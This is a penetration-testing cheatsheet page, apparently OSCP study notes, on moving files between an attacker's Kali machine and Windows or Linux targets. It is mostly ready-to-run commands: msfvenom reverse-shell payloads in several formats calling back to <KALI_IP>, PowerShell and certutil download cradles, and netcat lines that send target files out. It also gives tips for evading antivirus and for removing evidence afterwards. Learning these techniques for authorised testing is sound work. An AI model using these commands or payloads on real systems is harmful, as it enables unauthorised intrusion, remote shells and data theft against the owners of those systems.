File Transfer Techniques

Transferring files between your attack machine and target systems is a crucial skill during penetration testing. This document covers various techniques for moving files between Linux and Windows systems.

Linux to Windows File Transfers

Using SMB Server

One of the most reliable methods to transfer files from Kali Linux to Windows is using an SMB server:

# On Kali - Start an SMB server in the current directory
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py share_name .

# On Windows - Copy file from the SMB share
copy \\<KALI_IP>\share_name\file.exe C:\destination\file.exe

Example with reverse shell transfer:

Generate a reverse shell executable on Kali:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<KALI_IP> LPORT=53 -f exe -o reverse.exe

Start SMB server on Kali in the same directory as reverse.exe:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

On Windows, copy the file:

copy \\<KALI_IP>\kali\reverse.exe C:\PrivEsc\reverse.exe

Set up listener on Kali before executing:
```
sudo nc -nvlp 53
```
Run the executable on Windows:
```
C:\PrivEsc\reverse.exe
```

Using HTTP Server

Another common method is to use a simple HTTP server:

# On Kali - Start a Python HTTP server
python3 -m http.server 8000

# On Windows - Download using PowerShell
powershell -c "Invoke-WebRequest -Uri 'http://<KALI_IP>:8000/file.exe' -OutFile 'C:\destination\file.exe'"
# Alternative PowerShell method
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<KALI_IP>:8000/file.exe', 'C:\destination\file.exe')"

# On Windows - Download using certutil
certutil -urlcache -split -f "http://<KALI_IP>:8000/file.exe" C:\destination\file.exe

Using FTP Server

FTP can be useful when other methods are blocked:

# On Kali - Install and configure Python ftplib
sudo apt update
sudo apt install python3-pyftpdlib
python3 -m pyftpdlib -p 21 --write

# On Windows - Use native FTP client (create a script.txt file first)
echo open <KALI_IP> 21> ftp_commands.txt
echo anonymous>> ftp_commands.txt
echo password>> ftp_commands.txt
echo binary>> ftp_commands.txt
echo get file.exe>> ftp_commands.txt
echo bye>> ftp_commands.txt
ftp -s:ftp_commands.txt

Windows to Linux File Transfers

Using SMB Server

# On Kali - Start SMB server with write permissions
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -username user -password password share_name /path/to/share

# On Windows - Copy file to SMB share
copy C:\path\to\file.txt \\<KALI_IP>\share_name\

Using Netcat

# On Kali - Set up listener to receive file
nc -nlvp 4444 > received_file.txt

# On Windows - Send file
type C:\path\to\file.txt | nc <KALI_IP> 4444

Using Base64 Encoding

For small text files, base64 encoding/decoding can be used:

# On Windows - Encode file to base64
certutil -encode C:\path\to\file.txt encoded.b64

# Copy the base64 text and on Kali
echo "PASTE_BASE64_HERE" | base64 -d > file.txt

Creating Reverse Shells

Windows Reverse Shells

# Basic TCP reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<KALI_IP> LPORT=53 -f exe -o reverse.exe

# PowerShell reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<KALI_IP> LPORT=53 -f psh -o reverse.ps1

# DLL reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<KALI_IP> LPORT=53 -f dll -o reverse.dll

Linux Reverse Shells

# Basic TCP reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<KALI_IP> LPORT=53 -f elf -o reverse

# Python reverse shell
msfvenom -p cmd/unix/reverse_python LHOST=<KALI_IP> LPORT=53 -f raw -o reverse.py

Tips for OSCP

Always have multiple file transfer methods ready - Different environments may block different protocols
Use uncommon ports for reverse shells - Ports like 443, 53, 80 are less likely to be blocked
Create a directory of common payloads before the exam - Save time during the exam
Test your reverse shells before uploading - Make sure they work with your specific IP/port
Be mindful of antivirus - Some transfer methods or payloads may trigger AV detection

Common Issues and Solutions

SMB Connection Refused

Ensure you're running the SMB server with sudo
Check for firewall rules blocking port 445
Try using the -smb2support flag

Antivirus Blocking Transfers

Encode or encrypt executables
Use alternative transfer methods like Base64
Split the file into smaller chunks

Permission Issues

Check file permissions after transfer
Use icacls on Windows or chmod on Linux to set proper permissions
When using SMB, ensure the server allows write access if needed

Remember to clean up your tools and payloads after completing your tasks to avoid leaving evidence behind.

PreviousWindows Commands Cheatsheet

Last updated 9 months ago

hashtagLinux to Windows File Transfers

hashtagUsing SMB Server

hashtagUsing HTTP Server

hashtagUsing FTP Server

hashtagWindows to Linux File Transfers

hashtagUsing SMB Server

hashtagUsing Netcat

hashtagUsing Base64 Encoding

hashtagCreating Reverse Shells

hashtagWindows Reverse Shells

hashtagLinux Reverse Shells

hashtagTips for OSCP

hashtagCommon Issues and Solutions

hashtagSMB Connection Refused

hashtagAntivirus Blocking Transfers

hashtagPermission Issues

Linux to Windows File Transfers

Using SMB Server

Using HTTP Server

Using FTP Server

Windows to Linux File Transfers

Using SMB Server

Using Netcat

Using Base64 Encoding

Creating Reverse Shells

Windows Reverse Shells

Linux Reverse Shells

Tips for OSCP

Common Issues and Solutions

SMB Connection Refused

Antivirus Blocking Transfers

Permission Issues